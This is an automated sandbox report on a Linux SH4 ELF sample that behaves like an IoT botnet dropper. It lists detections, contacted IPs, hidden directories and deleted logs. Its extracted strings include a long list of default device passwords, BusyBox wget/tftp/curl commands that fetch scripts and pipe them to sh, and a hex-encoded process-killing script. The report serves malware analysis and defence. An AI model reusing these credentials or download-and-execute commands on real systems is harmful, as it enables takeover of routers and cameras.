Linux Analysis Report
la.bot.sh4.elf

Overview

General Information

Sample name: la.bot.sh4.elf
Analysis ID: 1541481
MD5: 9309c14e424befd1d916765b81c4382f
SHA1: de4eecbe9edf6c3465aea892051648d0f4083a96
SHA256: 7adeea8eed841ad165af8f6edbfbd62a4b714712dd60fb6d8c6fb17afc5cad8e
Tags: elfuser-abuse_ch
Infos:

Detection

Score: 76
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Deletes system log files
Sample tries to access files in /etc/config/ (typical for OpenWRT routers)
Sends malformed DNS queries
Uses known network protocols on non-standard ports
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: la.bot.sh4.elf Avira: detected
Multi AV Scanner detection for submitted file
Source: la.bot.sh4.elf ReversingLabs: Detection: 31%
Found strings indicative of a multi-platform dropper
Source: la.bot.sh4.elf String: ash|login|wget|curl|tftp|ntpdate
Source: la.bot.sh4.elf String: ash|login|wget|curl|tftp|ntpdate|ftp
Source: la.bot.sh4.elf String: /exe/maps|ash|login|wget|curl|tftp|ntpdate/usr/bin/usr/sbin/system/mnt/mtd/app/org/z/zbin/home/app/dvr/bin/duksan/userfs/mnt/app/usr/etc/dvr/main/usr/local/var/bin/tmp/sqfs/z/bin/dvr/mnt/mtd/zconf/gm/bin/home/process/var/challenge/usr/lib/lib/systemd//usr/lib/systemd/system/system/bin//mnt//home/helper/home/davinci/usr/libexec//sbin//bin//proc/net/tcp/fd/fd//proc/ash|login|wget|curl|tftp|ntpdate|ftp/lib//dev/watchdog/dev/misc/watchdogtelnetd|udhcpc|ntpclient|boa|httpd|mini_http|watchdog|pppdM
Source: la.bot.sh4.elf String: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORA/bin/busybox echo > .ri && sh .ri && cd .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrepwEek/var//var/run//var/tmp//dev//dev/shm//etc//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63\x2F\x2A\3B""\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A\x20\x20\x23\x20\x53\x6B\x69\x70\x20\x6E\x6F\x6E\x2D""\x6E\x75\x6D\x65\x72\x69\x63\x20\x64\x69\x72\x65\x63\x74\x6F\x72\x69\x65\x73\x0A\x20\x20\x69\x66\x20\x21\x20\x5B\x20\x22\x24\x70\x69\x64\x22\x20\x2D\x65""\x71\x20\x22\x24\x70\x69\x64\x22\x20\x5D\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x63\x6F\x6E\x74""\x69\x6E\x75\x65\x0A\x20\x20\x66\x69\x0A\x0A\x20\x20\x23\x20\x47\x65\x74\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x6F\x66""\x20\x74\x68\x65\x20\x70\x72\x6F\x63\x65\x73\x73\x0A\x20\x20\x63\x6D\x64\x6C\x69\x6E\x65\x3D\x24\x28\x74\x72\x20\x27\x5C\x30\x27\x20\x27\x20\x27\x20\x3C""\x20\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x63\x6D\x64\x6C\x69\x6E\x65\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x23""\x20\x43\x68\x65\x63\x6B\x20\x69\x66\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x63\x6F\x6E\x74\x61\x69\x6E\x73\x20\x22\x64""\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x0A\x20\x20\x69\x66\x20\x65\x63\x68\x6F\x20\x22\x24\x63\x6D\x64\x6C\x69\x6E\x65\x22\x20\x7C\x20\x67\x72\x65\x70\x20\x2D""\x71\x20\x22\x64\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64""\x22\x0A\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4

Networking
barindex
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 154.205.128.136 ports 2,3,4,8,9,38429
Sends malformed DNS queries
Source: global traffic DNS traffic detected: malformed DNS query: 2joints.libre. [malformed]
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 35076
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 35076
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 47606
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.23:46788 -> 154.205.128.136:38429
Sample listens on a socket
Source: /tmp/la.bot.sh4.elf (PID: 6237) Socket: 127.0.0.1:1234 Jump to behavior
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Source: global traffic TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 204.238.4.208
Source: unknown TCP traffic detected without corresponding DNS query: 204.238.4.208
Source: unknown TCP traffic detected without corresponding DNS query: 2.16.27.169
Source: unknown TCP traffic detected without corresponding DNS query: 2.16.27.169
Source: unknown TCP traffic detected without corresponding DNS query: 12.229.112.171
Source: unknown TCP traffic detected without corresponding DNS query: 12.229.112.171
Source: unknown TCP traffic detected without corresponding DNS query: 23.114.189.29
Source: unknown TCP traffic detected without corresponding DNS query: 23.114.189.29
Source: unknown TCP traffic detected without corresponding DNS query: 217.212.148.8
Source: unknown TCP traffic detected without corresponding DNS query: 217.212.148.8
Source: unknown TCP traffic detected without corresponding DNS query: 76.99.203.33
Source: unknown TCP traffic detected without corresponding DNS query: 76.99.203.33
Source: unknown TCP traffic detected without corresponding DNS query: 194.38.197.123
Source: unknown TCP traffic detected without corresponding DNS query: 61.204.249.218
Source: unknown TCP traffic detected without corresponding DNS query: 194.38.197.123
Source: unknown TCP traffic detected without corresponding DNS query: 61.204.249.218
Source: unknown TCP traffic detected without corresponding DNS query: 65.80.220.176
Source: unknown TCP traffic detected without corresponding DNS query: 65.80.220.176
Source: unknown TCP traffic detected without corresponding DNS query: 104.36.44.242
Source: unknown TCP traffic detected without corresponding DNS query: 104.36.44.242
Source: unknown TCP traffic detected without corresponding DNS query: 102.92.212.36
Source: unknown TCP traffic detected without corresponding DNS query: 52.97.112.33
Source: unknown TCP traffic detected without corresponding DNS query: 102.92.212.36
Source: unknown TCP traffic detected without corresponding DNS query: 222.226.196.201
Source: unknown TCP traffic detected without corresponding DNS query: 52.97.112.33
Source: unknown TCP traffic detected without corresponding DNS query: 47.188.146.248
Source: unknown TCP traffic detected without corresponding DNS query: 222.226.196.201
Source: unknown TCP traffic detected without corresponding DNS query: 167.156.248.162
Source: unknown TCP traffic detected without corresponding DNS query: 47.188.146.248
Source: unknown TCP traffic detected without corresponding DNS query: 167.156.248.162
Source: unknown TCP traffic detected without corresponding DNS query: 156.16.92.148
Source: unknown TCP traffic detected without corresponding DNS query: 192.88.88.218
Source: unknown TCP traffic detected without corresponding DNS query: 156.16.92.148
Source: unknown TCP traffic detected without corresponding DNS query: 193.181.151.206
Source: unknown TCP traffic detected without corresponding DNS query: 192.88.88.218
Source: unknown TCP traffic detected without corresponding DNS query: 42.71.169.148
Source: unknown TCP traffic detected without corresponding DNS query: 193.181.151.206
Source: unknown TCP traffic detected without corresponding DNS query: 81.97.231.253
Source: unknown TCP traffic detected without corresponding DNS query: 42.71.169.148
Source: unknown TCP traffic detected without corresponding DNS query: 122.80.135.40
Source: unknown TCP traffic detected without corresponding DNS query: 81.97.231.253
Source: unknown TCP traffic detected without corresponding DNS query: 203.45.44.138
Source: unknown TCP traffic detected without corresponding DNS query: 122.80.135.40
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 203.45.44.138
Source: unknown TCP traffic detected without corresponding DNS query: 196.14.64.142
Source: unknown TCP traffic detected without corresponding DNS query: 196.14.64.142
Source: unknown TCP traffic detected without corresponding DNS query: 101.208.113.142
Source: unknown TCP traffic detected without corresponding DNS query: 101.208.113.142
Source: global traffic DNS traffic detected: DNS query: 2joints.libre. [malformed]
Source: global traffic DNS traffic detected: DNS query: eighteen.pirate
Source: la.bot.sh4.elf String found in binary or memory: http:///curl.sh
Source: la.bot.sh4.elf String found in binary or memory: http:///wget.sh
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: usage: busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample String containing 'busybox' found: /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox hostname FICORA
Source: Initial sample String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample String containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
Source: Initial sample String containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep
Source: Initial sample String containing 'busybox' found: usage: busyboxincorrectinvalidbadwrongfaildeniederrorretryGET /dlr. HTTP/1.0
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne >> > upnp
Source: Initial sample String containing 'busybox' found: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORA/bin/busybox echo > .ri && sh .ri && cd .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrepwEek/var//var/run//var
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Sample tries to kill a process (SIGKILL)
Source: /tmp/la.bot.sh4.elf (PID: 6237) SIGKILL sent: pid: 936, result: successful Jump to behavior
Source: classification engine Classification label: mal76.troj.evad.linELF@0/0@2/0

Data Obfuscation
barindex
Sample tries to access files in /etc/config/ (typical for OpenWRT routers)
Source: /tmp/la.bot.sh4.elf (PID: 6243) File: /etc/config Jump to behavior
Creates hidden files and/or directories
Source: /tmp/la.bot.sh4.elf (PID: 6243) Directory: /root/.cache Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6243) Directory: /root/.ssh Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6243) Directory: /root/.config Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6243) Directory: /root/.local Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6243) Directory: /tmp/.X11-unix Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6243) Directory: /tmp/.Test-unix Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6243) Directory: /tmp/.font-unix Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6243) Directory: /tmp/.ICE-unix Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6243) Directory: /tmp/.XIM-unix Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6243) Directory: /etc/.java Jump to behavior
Enumerates processes within the "proc" file system
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/230/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/110/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/231/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/111/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/232/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/112/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/233/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/113/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/234/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/114/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/235/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/115/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/236/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/116/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/237/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/117/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/118/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/910/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/119/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/912/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/10/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/11/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/918/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/12/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/13/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/14/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/15/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/16/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/17/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/18/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/120/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/121/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/1/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/1/maps Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/122/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/243/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/123/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/2/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/124/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/3/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/4/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/125/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/126/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/127/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/6/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/248/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/128/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/249/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/800/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/9/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/801/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/20/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/21/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/22/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/23/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/24/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/25/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/26/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/27/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/28/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/29/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/491/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/250/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/130/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/251/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/252/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/132/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/253/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/254/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/255/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/256/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/257/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/379/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/258/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/259/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/936/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/30/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/35/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/260/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/261/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/141/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/262/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/263/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/264/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/144/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/265/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/266/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/267/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/269/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/270/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/272/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/274/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/278/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/157/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/281/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/286/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/720/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/721/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/847/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/77/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/78/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/79/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/80/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/81/fd Jump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6237) File opened: /proc/82/fd Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Deletes system log files
Source: /tmp/la.bot.sh4.elf (PID: 6243) Log files deleted: /var/log/kern.log Jump to behavior
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 35076
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 35076
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 47606
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/la.bot.sh4.elf (PID: 6237) Queries kernel information via 'uname': Jump to behavior
Source: la.bot.sh4.elf, 6237.1.00007ffc1b261000.00007ffc1b282000.rw-.sdmp Binary or memory string: Wx86_64/usr/bin/qemu-sh4/tmp/la.bot.sh4.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/la.bot.sh4.elf
Source: la.bot.sh4.elf, 6237.1.00007ffc1b261000.00007ffc1b282000.rw-.sdmp Binary or memory string: /usr/bin/qemu-sh4
Source: la.bot.sh4.elf, 6237.1.0000559294dbf000.0000559294e44000.rw-.sdmp Binary or memory string: U5!/etc/qemu-binfmt/sh4
Source: la.bot.sh4.elf, 6237.1.0000559294dbf000.0000559294e44000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/sh4

No Screenshots

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
58.238.119.24
 unknown Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR false
74.230.217.63
 unknown United States
7018 ATT-INTERNET4US false
21.157.124.152
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
11.122.30.216
 unknown United States
27651 ENTELCHILESACL false
95.68.72.113
 unknown Latvia
12578 APOLLO-ASLatviaLV false
121.111.70.61
 unknown Japan 2516 KDDIKDDICORPORATIONJP false
122.182.66.134
 unknown India
9498 BBIL-APBHARTIAirtelLtdIN false
130.1.97.20
 unknown United States
6908 DATAHOPDatahop-SixDegreesGB false
128.190.63.218
 unknown United States
1503 DNIC-AS-01503US false
62.59.108.36
 unknown Belgium
13127 VERSATELASfortheTrans-EuropeanTele2IPTransportbackbo false
53.161.243.93
 unknown Germany
31399 DAIMLER-ASITIGNGlobalNetworkDE false
200.149.200.182
 unknown Brazil
7738 TelemarNorteLesteSABR false
186.173.188.164
 unknown Chile
3816 COLOMBIATELECOMUNICACIONESSAESPCO false
100.141.6.103
 unknown United States
21928 T-MOBILE-AS21928US false
80.151.97.176
 unknown Germany
3320 DTAGInternetserviceprovideroperationsDE false
84.51.228.121
 unknown Ireland
15533 SASEUROPEGB false
169.100.231.69
 unknown United States
37611 AfrihostZA false
132.86.79.2
 unknown United States
306 DNIC-ASBLK-00306-00371US false
48.241.251.203
 unknown United States
2686 ATGS-MMD-ASUS false
119.125.49.22
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
165.252.97.17
 unknown United States
7018 ATT-INTERNET4US false
148.14.122.26
 unknown United States
394673 9408US false
3.227.114.216
 unknown United States
14618 AMAZON-AESUS false
56.161.19.245
 unknown United States
2686 ATGS-MMD-ASUS false
159.81.168.56
 unknown Norway
25400 TELIA-NORWAY-ASTeliaNorwayCoreNetworksNO false
208.121.45.197
 unknown United States
39961 CCSFUS false
175.28.198.100
 unknown Japan 7679 QTNETQTnetIncJP false
59.106.95.91
 unknown Japan 9370 SAKURA-BSAKURAInternetIncJP false
6.117.142.160
 unknown United States
3356 LEVEL3US false
115.96.199.38
 unknown India
17488 HATHWAY-NET-APHathwayIPOverCableInternetIN false
75.216.184.144
 unknown United States
22394 CELLCOUS false
9.59.168.102
 unknown United States
3356 LEVEL3US false
158.21.101.242
 unknown United States
32033 EXXONMOBIL-UTEC-ASUS false
223.6.198.112
 unknown China
37963 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd false
193.207.27.29
 unknown Italy
8612 TISCALI-IT false
11.40.177.219
 unknown United States
3356 LEVEL3US false
56.84.114.180
 unknown United States
2686 ATGS-MMD-ASUS false
147.86.193.34
 unknown Switzerland
559 SWITCHPeeringrequestspeeringswitchchEU false
168.138.244.186
 unknown United States
31898 ORACLE-BMC-31898US false
27.223.108.245
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
33.210.68.106
 unknown United States
2686 ATGS-MMD-ASUS false
34.176.7.160
 unknown United States
2686 ATGS-MMD-ASUS false
70.45.203.210
 unknown Puerto Rico
14638 LCPRLUS false
121.252.177.68
 unknown Korea Republic of
24361 CNGI-NJ-IX-AS-APCERNET2IXatSoutheastUniversityCN false
107.40.156.40
 unknown United States
16567 NETRIX-16567US false
96.122.23.132
 unknown United States
7922 COMCAST-7922US false
39.33.50.173
 unknown Pakistan
45595 PKTELECOM-AS-PKPakistanTelecomCompanyLimitedPK false
143.47.99.81
 unknown Ireland
52019 ORCL-EMEA-ASSE false
82.48.178.37
 unknown Italy
3269 ASN-IBSNAZIT false
128.210.46.242
 unknown United States
17 PURDUEUS false
30.118.88.142
 unknown United States
7922 COMCAST-7922US false
125.0.247.139
 unknown Japan 2510 INFOWEBFUJITSULIMITEDJP false
64.133.247.223
 unknown United States
1239 SPRINTLINKUS false
